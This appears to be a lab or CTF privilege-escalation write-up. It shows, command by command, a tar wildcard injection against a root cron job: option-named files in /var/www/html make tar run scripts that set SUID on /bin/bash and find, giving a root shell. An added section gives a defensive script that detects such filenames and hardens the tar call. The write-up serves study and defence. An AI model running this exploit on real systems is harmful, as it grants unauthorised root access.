Priv Escalation


Last updated 2 years ago

Cron job running as root: see if we can modify it, otherwise try mysql running on internal.

Tar Wildcard Injection

The script changes to /var/www/html, which is a directory we have write access to.

alice@readys:/var/www/html$ echo "" > "--checkpoint-action=exec=sh demo.sh"
echo "" > "--checkpoint-action=exec=sh demo.sh"
alice@readys:/var/www/html$ echo "" > --checkpoint=1
echo "" > --checkpoint=1
alice@readys:/var/www/html$ echo "chmod u+s /usr/bin/find" > test.sh
echo "chmod u+s /usr/bin/find" > test.sh
alice@readys:/var/www/html$ echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > "--checkpoint-action=exec=sh test.sh"
alice@readys:/var/www/html$ echo "" > --checkpoint=1
echo "" > --checkpoint=1
alice@readys:/var/www/html$ echo "chmod +s /bin/bash" > exploit.sh
echo "chmod +s /bin/bash" > exploit.sh
alice@readys:/var/www/html$ touch ./"--checkpoint=1"
touch ./"--checkpoint=1"
alice@readys:/var/www/html$ touch ./"--checkpoint-action=exec=bash exploit.sh"
< touch ./"--checkpoint-action=exec=bash exploit.sh"

These are the ways I did it.

bash-5.0$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
bash-5.0$ /bin/bash -p
bash-5.0# whoami
root
bash-5.0# ls -l /usr/bin/find
-rwsr-xr-x 1 root root 315904 Feb 16  2019 /usr/bin/find
bash-5.0#
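
On the defensive side, the condition abused above can be audited and removed. The following is an added example, not part of the original writeup: it lists filenames that tar would parse as options and archives a directory with `./*` so no expanded name can start with `-`. The function names are hypothetical, and the job is assumed to have the form `cd DIR && tar -cf ARCHIVE *`, which the page does not show.

```shell
#!/bin/sh
# Added example (not from the writeup): audit and harden a root-run
# tar job that archives a directory writable by a less-privileged user.

# Print every entry directly inside directory $1 whose name begins
# with "-". An unquoted `*` expands to these names and passes them to
# tar as command-line arguments, where they are parsed as options.
list_option_like_names() {
    dir=$1
    # Depth 1 only: exactly the names a glob in that directory yields.
    find "$dir" -mindepth 1 -maxdepth 1 -name '-*' -print
}

# Number of such entries. 0 means a `tar ... *` job run in that
# directory currently receives no injected options.
count_option_like_names() {
    list_option_like_names "$1" | wc -l | tr -d ' '
}

# Hardened form of the assumed job `cd DIR && tar -cf ARCHIVE *`.
# With `./*` every expanded name starts with "./", so tar treats all
# of them as file operands. ARCHIVE should be an absolute path outside
# DIR, in a location the unprivileged user cannot write to.
safe_backup() {
    dir=$1
    archive=$2
    ( cd "$dir" && tar -cf "$archive" ./* )
}

# Typical use from a monitoring job (paths are placeholders):
#   n=$(count_option_like_names /var/www/html)
#   [ "$n" -eq 0 ] || logger "option-like filenames in web root: $n"
```

A non-zero count in a directory that a privileged job archives is worth alerting on, since such names have no legitimate reason to exist in a web root.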